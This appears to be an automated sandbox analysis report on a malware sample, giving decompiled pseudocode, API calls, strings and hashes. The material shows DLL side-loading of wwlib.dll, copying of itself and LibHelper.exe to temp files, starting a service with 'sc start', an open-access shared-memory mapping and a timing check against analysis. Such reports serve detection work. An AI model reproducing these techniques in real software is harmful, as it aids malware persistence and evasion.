				_push(0x6d875490);
				_push(E6D865090);
				_push( *[fs:0x0]);
				_t34 =  *0x6d877014; // 0x6a907f72
				_v12 = _v12 ^ _t34;
				_t35 = _t34 ^ _t84;
				_v32 = _t35;
				_push(__edi);
				_push(_t35);
				 *[fs:0x0] =  &_v20;
				_v28 = _t85 - 0x40;
				_t80 = 0;
				_t64 = 0;
				_v72 = 0;
				_v76 = 0;
				if(E6D862D10() == 0) {
					E6D8631E0(GetCurrentThread());
					_t43 = E6D8627B0(0x6d8c1a78, E6D861150); // executed
					if(_t43 == 0) {
						_t44 = E6D862D70(); // executed
						if(_t44 == 0) {
							InitializeSecurityDescriptor( &_v52, 1);
							SetSecurityDescriptorDacl( &_v52, 1, 0, 0);
							_v64.nLength = 0xc;
							_v64.bInheritHandle = 0;
							_v64.lpSecurityDescriptor =  &_v52;
							_t51 = CreateFileMappingA(0xffffffff,  &_v64, 0x8000004, 0, 0x400, "Global\\mshares"); // executed
							_t80 = _t51;
							_v68 = _t80;
							if(_t80 == 0) {
								GetLastError();
							} else {
								_t53 = MapViewOfFile(_t80, 6, 0, 0, 0x400); // executed
								_t64 = _t53;
								_v80 = _t64;
								if(_t64 != 0) {
									E6D865880(__edi, _t64, 0, 0x400);
									_v8 = 0;
									_t70 =  *0x6d877880; // 0x32d9
									 *0x6d877880 = _t70 +  *(_t64 + 4) /  *_t64;
									_t77 = _t64;
									_t23 = _t77 + 1; // 0x1
									_t72 = _t23;
									do {
										_t57 =  *_t77;
										_t77 = _t77 + 1;
										_t96 = _t57;
									} while (_t57 != 0);
									_t78 = _t77 - _t72;
									_v76 = _t78;
									_t25 = _t78 + 1; // 0x2
									_push(_t25);
									_t58 = E6D8640A6(_t96);
									_v84 = _t58;
									_t83 = _t58;
									E6D865880(_t78, _t83, 0, _t25);
									_v72 = _t83;
									E6D8659E0(_t83, _t64, _t78);
									_v8 = 0xfffffffe;
									_push(8);
									_t61 = E6D864299(_t96);
									 *_t61 = _t83;
									 *((intOrPtr*)(_t61 + 4)) = _t78;
									CreateThread(0, 0, E6D8611D0, _t61, 0, 0); // executed
									_t80 = _v68;
								}
							}
						}
					}
				}
				if(_t80 != 0) {
					FindCloseChangeNotification(_t80); // executed
				}
				if(_t64 != 0) {
					UnmapViewOfFile(_t64);
				}
				 *[fs:0x0] = _v20;
				return E6D864095(_v32 ^ _t84);
			}

0x6d8611f3
0x6d8611f5
0x6d8611fa
0x6d861205
0x6d861209
0x6d86120e
0x6d861211
0x6d861213
0x6d861218
0x6d861219
0x6d86121d
0x6d861223
0x6d861226
0x6d861228
0x6d86122a
0x6d86122d
0x6d861237
0x6d861244
0x6d861253
0x6d86125a
0x6d861260
0x6d861267
0x6d861273
0x6d861281
0x6d861287
0x6d86128e
0x6d861294
0x6d8612ad
0x6d8612b3
0x6d8612b5
0x6d8612ba
0x6d8613b9
0x6d8612c0
0x6d8612ca
0x6d8612d0
0x6d8612d2
0x6d8612d7
0x6d8612e5
0x6d8612f0
0x6d8612fe
0x6d861306
0x6d86130c
0x6d86130e
0x6d86130e
0x6d861311
0x6d861311
0x6d861313
0x6d861314
0x6d861314
0x6d861318
0x6d86131a
0x6d86131d
0x6d861320
0x6d861321
0x6d861326
0x6d86132c
0x6d86132f
0x6d861334
0x6d86133a
0x6d861342
0x6d861382
0x6d861384
0x6d86138c
0x6d86138e
0x6d86139f
0x6d8613a5
0x6d8613a5
0x6d8612d7
0x6d8612ba
0x6d861267
0x6d86125a
0x6d8613c1
0x6d8613c4
0x6d8613c4
0x6d8613cc
0x6d8613cf
0x6d8613cf
0x6d8613d8
0x6d8613f0

APIs

GetCurrentThread.KERNEL32 ref: 6D86123D
InitializeSecurityDescriptor.ADVAPI32(?,00000001,6D8C1A78,6D861150,00000000), ref: 6D861273
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6D861281
CreateFileMappingA.KERNEL32 ref: 6D8612AD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000400), ref: 6D8612CA
CreateThread.KERNELBASE(00000000,00000000,Function_000011D0,00000000,00000000,00000000), ref: 6D86139F
GetLastError.KERNEL32 ref: 6D8613B9
FindCloseChangeNotification.KERNELBASE(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613C4
UnmapViewOfFile.KERNEL32(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613CF

Strings

Global\mshares, xrefs: 6D861297

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateDescriptorSecurityThreadView$ChangeCloseCurrentDaclErrorFindInitializeLastMappingNotificationUnmap
String ID: Global\mshares
API String ID: 1286842342-2130681182
Opcode ID: fe5c970783b3dfc6efa0d5f4e7a7f610723989f26c08fa14a71e21cf66aced5e
Instruction ID: df2699effe3bea71c49ad574c2ebffa4806820a88b061df8859d2f750d13cb08
Opcode Fuzzy Hash: fe5c970783b3dfc6efa0d5f4e7a7f610723989f26c08fa14a71e21cf66aced5e
Instruction Fuzzy Hash: 6C41B1B1D04668EFDB109FA9CD4DFAE7BB8FB09B24F000519FA15A6281E7355800CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 2FF1159F, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E2FF1159F(void* __ebx, short __edx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __edi;
				void* __ebp;
				struct HINSTANCE__* _t5;
				void* _t9;
				_Unknown_base(*)()* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t20;
				struct HINSTANCE__* _t21;
				void* _t22;

				_t22 = __esi;
				_t16 = __ebx;
				_push(L"wwlib.dll"); // executed
				_t5 = E2FF11656(__ebx, _t20, __esi, __eflags); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					_t21 = E2FF12024(__edx, _t21, __esi, L"{019C826E-445A-4649-A5B0-0BF08FCC4EEE}");
					__eflags = _t21;
					if(_t21 != 0) {
						goto L1;
					}
					GetLastError();
					return 1;
				}
				L1:
				_push(_t16);
				_push(_t22);
				_t17 = GetProcAddress(_t21, "FMain");
				if(_t17 == 0) {
					L7:
					_t9 = 1;
					L5:
					return _t9;
				}
				 *0x2ff13010 = GetProcAddress(_t21, "wdCommandDispatch");
				_t11 = GetProcAddress(_t21, "wdGetApplicationObject");
				 *0x2ff13014 = _t11;
				if( *0x2ff13010 == 0 || _t11 == 0) {
					goto L7;
				} else {
					 *_t17(_a4, _a8, _a12, _a16);
					_t9 = 0;
					goto L5;
				}
			}

0x2ff1159f
0x2ff1159f
0x2ff115a3
0x2ff115a8
0x2ff115ad
0x2ff115b1
0x2ff11cce
0x2ff11cd0
0x2ff11cd2
0x00000000
0x00000000
0x2ff11cd8
0x00000000
0x2ff11ce0
0x2ff115b7
0x2ff115b7
0x2ff115b8
0x2ff115c7
0x2ff115cb
0x2ff1160b
0x2ff1160d
0x2ff11604
0x00000000
0x2ff11605
0x2ff115db
0x2ff115e0
0x2ff115e9
0x2ff115ee
0x00000000
0x2ff115f4
0x2ff11600
0x2ff11602
0x00000000
0x2ff11602

APIs

Part of subcall function 2FF11656: LoadLibraryW.KERNELBASE(?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11685

GetProcAddress.KERNEL32(00000000,FMain), ref: 2FF115C5
GetProcAddress.KERNEL32(00000000,wdCommandDispatch), ref: 2FF115D3
GetProcAddress.KERNEL32(00000000,wdGetApplicationObject), ref: 2FF115E0
GetLastError.KERNEL32({019C826E-445A-4649-A5B0-0BF08FCC4EEE},wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11CD8

Strings

wwlib.dll, xrefs: 2FF115A3
FMain, xrefs: 2FF115BF
wdCommandDispatch, xrefs: 2FF115CD
{019C826E-445A-4649-A5B0-0BF08FCC4EEE}, xrefs: 2FF11CC4
wdGetApplicationObject, xrefs: 2FF115D5

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: FMain$wdCommandDispatch$wdGetApplicationObject$wwlib.dll${019C826E-445A-4649-A5B0-0BF08FCC4EEE}
API String ID: 856020675-2078634211
Opcode ID: d14f2e4602a0f4e28df0d7e8fbbdb3f13a1f91f09e294bb466dcc46944fc8816
Instruction ID: 8b4ac3a2032848896e84c017a991beefc57bec694339961f258209e3651fda33
Opcode Fuzzy Hash: d14f2e4602a0f4e28df0d7e8fbbdb3f13a1f91f09e294bb466dcc46944fc8816
Instruction Fuzzy Hash: 9501D1325002057BBB125FB68C40A9B7BFFEF852A5B0A0836F704E2310DB77D4119AB4

Uniqueness

Uniqueness Score: -1.00%

Function 6D861351, Relevance: 9.1, APIs: 6, Instructions: 83
filesleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D861351() {
				long _t24;
				void _t29;
				void _t30;
				void* _t33;
				void* _t38;
				intOrPtr _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t51;
				void _t55;
				void* _t56;
				signed int _t58;

				_t24 = GetTickCount();
				Sleep(0x7d0); // executed
				if(GetTickCount() - _t24 >= 0xa) {
					 *(_t58 - 4) = 0xfffffffe;
					_t38 =  *(_t58 - 0x4c);
					 *(_t58 - 4) = 0;
					_t40 =  *0x6d877880; // 0x32d9
					 *0x6d877880 = _t40 +  *(_t38 + 4) /  *_t38;
					_t50 = _t38;
					_t8 = _t50 + 1; // 0x1
					_t42 = _t8;
					do {
						_t29 =  *_t50;
						_t50 = _t50 + 1;
						_t66 = _t29;
					} while (_t29 != 0);
					_t51 = _t50 - _t42;
					 *((intOrPtr*)(_t58 - 0x48)) = _t51;
					_t10 = _t51 + 1; // 0x2
					_push(_t10);
					_t30 = E6D8640A6(_t66);
					 *(_t58 - 0x50) = _t30;
					_t55 = _t30;
					E6D865880(_t51, _t55, 0, _t10);
					 *(_t58 - 0x44) = _t55;
					E6D8659E0(_t55, _t38, _t51);
					 *(_t58 - 4) = 0xfffffffe;
				} else {
					 *(__ebp - 4) = 0xfffffffe;
					__edi =  *((intOrPtr*)(__ebp - 0x48));
				}
				_push(8);
				_t33 = E6D864299(_t66);
				 *_t33 = _t55;
				 *((intOrPtr*)(_t33 + 4)) = _t51;
				CreateThread(0, 0, E6D8611D0, _t33, 0, 0); // executed
				_t56 =  *(_t58 - 0x40);
				if(_t56 != 0) {
					FindCloseChangeNotification(_t56); // executed
				}
				if(_t38 != 0) {
					UnmapViewOfFile(_t38);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0x10));
				return E6D864095( *(_t58 - 0x1c) ^ _t58);
			}

0x6d86135a
0x6d861363
0x6d861370
0x6d8613aa
0x6d8613b1
0x6d8612f0
0x6d8612fe
0x6d861306
0x6d86130c
0x6d86130e
0x6d86130e
0x6d861311
0x6d861311
0x6d861313
0x6d861314
0x6d861314
0x6d861318
0x6d86131a
0x6d86131d
0x6d861320
0x6d861321
0x6d861326
0x6d86132c
0x6d86132f
0x6d861334
0x6d86133a
0x6d861342
0x6d861372
0x6d861372
0x6d86137f
0x6d86137f
0x6d861382
0x6d861384
0x6d86138c
0x6d86138e
0x6d86139f
0x6d8613a5
0x6d8613c1
0x6d8613c4
0x6d8613c4
0x6d8613cc
0x6d8613cf
0x6d8613cf
0x6d8613d8
0x6d8613f0

APIs

GetTickCount.KERNEL32 ref: 6D86135A
Sleep.KERNELBASE(000007D0), ref: 6D861363
GetTickCount.KERNEL32 ref: 6D861369
CreateThread.KERNELBASE(00000000,00000000,Function_000011D0,00000000,00000000,00000000), ref: 6D86139F
FindCloseChangeNotification.KERNELBASE(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613C4
UnmapViewOfFile.KERNEL32(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613CF

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$ChangeCloseCreateFileFindNotificationSleepThreadUnmapView
String ID:
API String ID: 2401965125-0
Opcode ID: 2f386b97df5756811f8f0f22eb67dedf36ccdf74e247c65cea9e1956a3311a9f
Instruction ID: 9f1984ce186830c1281abf2337fe3c011178222e1b6049bdd272f6e9b66ccce6
Opcode Fuzzy Hash: 2f386b97df5756811f8f0f22eb67dedf36ccdf74e247c65cea9e1956a3311a9f
Instruction Fuzzy Hash: 4621AE71D04664DFDB148F69C94CBADBB75FF8AB30F104659E9166B381DB312902CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 2FF116C4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E2FF116C4(intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t7;
				void* _t8;
				void* _t9;
				intOrPtr _t10;

				_t10 = 0;
				if( *0x2ff13020 != 0) {
					OutputDebugStringA("IsolationAware function called after IsolationAwareCleanup\n");
				}
				if( *0x2ff13018 != _t10) {
					L5:
					_t10 = 1;
				} else {
					_t14 =  *0x2ff13020 - _t10;
					if( *0x2ff13020 != _t10) {
						L4:
						_push(_a4);
						_push( *0x2ff13000);
						if(E2FF11A62() == 0) {
							goto L7;
						} else {
							goto L5;
						}
					} else {
						_t7 = E2FF11716(_t8, _t9, _t10, _t14); // executed
						if(_t7 == 0) {
							L7:
							_t4 = GetLastError();
							__eflags = _t4 - 0x7f;
							if(_t4 == 0x7f) {
								L12:
								 *0x2ff13018 = 1;
								_t10 = 1;
							} else {
								__eflags = _t4 - 0x7e;
								if(_t4 == 0x7e) {
									goto L12;
								} else {
									__eflags = _t4 - 0x78;
									if(_t4 == 0x78) {
										goto L12;
									}
								}
							}
						} else {
							goto L4;
						}
					}
				}
				return _t10;
			}

0x2ff116c8
0x2ff116d0
0x2ff11c38
0x2ff11c38
0x2ff116dc
0x2ff11701
0x2ff11703
0x2ff116de
0x2ff116de
0x2ff116e4
0x2ff116ef
0x2ff116ef
0x2ff116f2
0x2ff116ff
0x00000000
0x00000000
0x00000000
0x00000000
0x2ff116e6
0x2ff116e6
0x2ff116ed
0x2ff1170b
0x2ff1170b
0x2ff11c43
0x2ff11c46
0x2ff11c56
0x2ff11c59
0x2ff11c5e
0x2ff11c48
0x2ff11c48
0x2ff11c4b
0x00000000
0x2ff11c4d
0x2ff11c4d
0x2ff11c50
0x00000000
0x00000000
0x2ff11c50
0x2ff11c4b
0x00000000
0x00000000
0x00000000
0x2ff116ed
0x2ff116e4
0x2ff11708

APIs

GetLastError.KERNEL32(?,00000001,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF1170B

Part of subcall function 2FF11716: GetModuleFileNameW.KERNEL32(?,?,00000105,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001), ref: 2FF117D8
Part of subcall function 2FF11716: GetLastError.KERNEL32(00000020), ref: 2FF1183D

OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,00000001,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11C38

Strings

IsolationAware function called after IsolationAwareCleanup, xrefs: 2FF11C33

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$DebugFileModuleNameOutputString
String ID: IsolationAware function called after IsolationAwareCleanup
API String ID: 3265401609-2690750368
Opcode ID: 54bdce36f1b61013c6e3a173b7d2c9c0d9897d0d073f6860d03fca624d10a9b4
Instruction ID: bd64b080485c31a5c603d6a5b41ed63ee6c58c5cfa88ce4ef7d09f85201fbb1d
Opcode Fuzzy Hash: 54bdce36f1b61013c6e3a173b7d2c9c0d9897d0d073f6860d03fca624d10a9b4
Instruction Fuzzy Hash: 3CF0B431904320BBBF654BA288449D73BEFAF066A23220137E705C1321D326D768DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0303166A, Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 215stringfileprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 03031020: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 03031043
Part of subcall function 03031020: _strrchr.LIBCMT ref: 03031052

GetModuleFileNameA.KERNEL32(00000000,404,00000104), ref: 0303175B
_strrchr.LIBCMT ref: 03031764
lstrcpy.KERNEL32(404,404), ref: 03031776
lstrcat.KERNEL32(404,wwlib.dll), ref: 03031788
CopyFileA.KERNEL32(404,C:\Users\user\AppData\Local\Temp\edgDDEB.tmp,00000000), ref: 03031798
lstrcat.KERNEL32(404,LibHelper.exe), ref: 030317A0
CopyFileA.KERNEL32(404,C:\Users\user\AppData\Local\Temp\edgDDEC.tmp,00000000), ref: 030317AA
WinExec.KERNEL32(?,00000000), ref: 030318E1
GetCurrentProcess.KERNEL32(00000000), ref: 030318E8
TerminateProcess.KERNEL32(00000000), ref: 030318EF

Strings

C:\Users\user\AppData\Local\Temp\edgDDEB.tmp, xrefs: 03031710, 0303178C, 03031804, 03031821
ghka333-fagg-330fa-21-3351e, xrefs: 030317AF
sc start "%s", xrefs: 030318C3
C:\Users\user\AppData\Local\Temp\edgDDEC.tmp, xrefs: 0303171A, 030317A4, 03031828, 03031848
C:\Users\user\AppData\Local\Temp\edgDDEA.tmp, xrefs: 03031706
LibHelper.exe, xrefs: 0303179A
404, xrefs: 03031754, 03031759, 03031763, 0303176B, 03031787, 03031791
wwlib.dll, xrefs: 03031782
404, xrefs: 0303176C, 03031775, 0303179F, 030317A9

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: File$CopyModuleNameProcess_strrchrlstrcat$CurrentExecTerminatelstrcpy
String ID: 404$404$C:\Users\user\AppData\Local\Temp\edgDDEA.tmp$C:\Users\user\AppData\Local\Temp\edgDDEB.tmp$C:\Users\user\AppData\Local\Temp\edgDDEC.tmp$LibHelper.exe$ghka333-fagg-330fa-21-3351e$sc start "%s"$wwlib.dll
API String ID: 3008500518-1127021472
Opcode ID: b5cd246d953c8480bd18b3242ab4093a6bf36e7615b7f304f2b67ab70b426aab
Instruction ID: f9ddc00e0eb91c18f1decccb74188e976c18f3a634685e13f640a1b57f6659fb
Opcode Fuzzy Hash: b5cd246d953c8480bd18b3242ab4093a6bf36e7615b7f304f2b67ab70b426aab
Instruction Fuzzy Hash: 8D61F9B99032056BDF18FF74DC44AFA779DEF4B204F0846B8D945AB142DB399A0687A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8640DB, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6D8640DB(_Unknown_base(*)()* __edi, void* __esi) {
				struct HINSTANCE__* _t2;
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x6d8c1030, 0xfa0);
				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_t14 = _t2;
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x6d8c102c = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x6d8c1048 = _t11;
						 *0x6d8c104c = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E6D864A9B(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x6d8c1030);
						_t7 =  *0x6d8c102c; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}

0x6d8640db
0x6d8640dc
0x6d8640e7
0x6d8640f2
0x6d8640f8
0x6d8640fc
0x6d86410f
0x6d864121
0x6d864123
0x6d86412b
0x6d864146
0x6d86414c
0x6d864153
0x00000000
0x00000000
0x00000000
0x00000000
0x6d864131
0x6d864131
0x6d864137
0x6d86413c
0x6d86413e
0x6d86413e
0x6d8640fe
0x6d864109
0x6d86410d
0x6d864155
0x6d864157
0x6d86415c
0x6d864162
0x6d864168
0x6d86416f
0x00000000
0x6d864172
0x6d864178
0x00000000
0x00000000
0x00000000
0x6d86410d

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6D8C1030,00000FA0,?,?,6D8640B9), ref: 6D8640E7
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,6D8640B9), ref: 6D8640F2
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6D8640B9), ref: 6D864103
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D864115
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D864123
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6D8640B9), ref: 6D864146
___scrt_fastfail.LIBCMT ref: 6D864157
DeleteCriticalSection.KERNEL32(6D8C1030,00000007,?,?,6D8640B9), ref: 6D864162
CloseHandle.KERNEL32(00000000,?,?,6D8640B9), ref: 6D864172

Strings

SleepConditionVariableCS, xrefs: 6D86410F
kernel32.dll, xrefs: 6D8640FE
WakeAllConditionVariable, xrefs: 6D86411B
api-ms-win-core-synch-l1-2-0.dll, xrefs: 6D8640ED

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 2f561ccc20816c5f57035651c21c8da9f3ce177afc464749ad05d6e8fa16b301
Instruction ID: c49a5d458544414dfacdc3da7aa5c0afcff2448ab4c4558e8f41bc6498915cd3
Opcode Fuzzy Hash: 2f561ccc20816c5f57035651c21c8da9f3ce177afc464749ad05d6e8fa16b301
Instruction Fuzzy Hash: 11017C75A086A2EBDB215B7B8C5CF7E3A79AB8FB61B010815F914D6341EB31C400CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 2FF110F6, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 62
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E2FF110F6() {
				long _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t13;
				signed int _t14;
				signed int _t15;
				int _t23;
				intOrPtr* _t28;
				void _t34;

				_t28 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "HeapSetInformation");
				if(_t28 != 0) {
					 *_t28(GetProcessHeap(), 1, 0, 0);
				}
				GetSystemTimeAsFileTime( &_v16);
				_t13 = GetCurrentProcessId();
				_t14 = GetCurrentThreadId();
				_t15 = GetTickCount();
				QueryPerformanceCounter( &_v24);
				_t34 = _v16.dwHighDateTime ^ _v16.dwLowDateTime ^ _t13 ^ _t14 ^ _t15 ^ _v20 ^ _v24.LowPart;
				VirtualProtect(0x2ff11b94, 4, 0x40,  &_v8); // executed
				 *0x2ff11b94 = _t34;
				if(_t34 == 0) {
					 *0x2ff11b94 = 0xbb40e64e;
				}
				_t23 = VirtualProtect(0x2ff11b94, 4, _v8,  &_v8); // executed
				 *0x2ff13004 = 0x44bf19b1;
				return _t23;
			}

0x2ff11116
0x2ff1111a
0x2ff11129
0x2ff11129
0x2ff1112f
0x2ff1113b
0x2ff11143
0x2ff1114b
0x2ff11157
0x2ff11169
0x2ff11179
0x2ff1117b
0x2ff11183
0x2ff11d36
0x2ff11d36
0x2ff11193
0x2ff11197
0x2ff111a3

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,HeapSetInformation), ref: 2FF11109
GetProcAddress.KERNEL32(00000000), ref: 2FF11110
GetProcessHeap.KERNEL32(00000001,00000000,00000000), ref: 2FF11122
GetSystemTimeAsFileTime.KERNEL32(?), ref: 2FF1112F
GetCurrentProcessId.KERNEL32 ref: 2FF1113B
GetCurrentThreadId.KERNEL32 ref: 2FF11143
GetTickCount.KERNEL32 ref: 2FF1114B
QueryPerformanceCounter.KERNEL32(?), ref: 2FF11157
VirtualProtect.KERNELBASE(2FF11B94,00000004,00000040,?), ref: 2FF11179
VirtualProtect.KERNELBASE(2FF11B94,00000004,?,?), ref: 2FF11193

Strings

kernel32.dll, xrefs: 2FF11104
HeapSetInformation, xrefs: 2FF110FF

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcessProtectTimeVirtual$AddressCountCounterFileHandleHeapModulePerformanceProcQuerySystemThreadTick
String ID: HeapSetInformation$kernel32.dll
API String ID: 2966426798-3597996958
Opcode ID: 99f650068c1d7ede0108f6501e7cc6d8bf19525e57b6997306f5a7bf8a1bfaae
Instruction ID: 1de7169bcdae207c6817480d4b1bec05964e34c413565acc5c8f23616c139794
Opcode Fuzzy Hash: 99f650068c1d7ede0108f6501e7cc6d8bf19525e57b6997306f5a7bf8a1bfaae
Instruction Fuzzy Hash: A51121B6D00258ABF7109BF18D48B9FB7BCAF08765F530551EB01F7354D6389A148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 2FF110EC, Relevance: 18.1, APIs: 12, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 68%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t25;
				signed int _t28;
				int _t30;
				signed int _t31;
				signed int _t32;
				int _t33;
				signed int _t35;
				signed int _t38;
				long _t40;
				void* _t50;
				long _t54;
				signed int _t56;
				intOrPtr* _t57;
				void* _t59;

				_t50 = __edx;
				E2FF110F6(); // executed
				_push(0x58);
				_push(0x2ff112e8);
				E2FF11310(__ebx, __edi, __esi);
				_t40 = 0;
				 *(_t59 - 0x1c) = 0;
				 *((intOrPtr*)(_t59 - 4)) = 0;
				GetStartupInfoA(_t59 - 0x68);
				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
				 *((intOrPtr*)(_t59 - 4)) = 1;
				_t54 =  *( *[fs:0x18] + 4);
				while(1) {
					_t25 = InterlockedCompareExchange(0x2ff13074, _t54, 0);
					if(_t25 == 0) {
						break;
					}
					__eflags = _t25 - _t54;
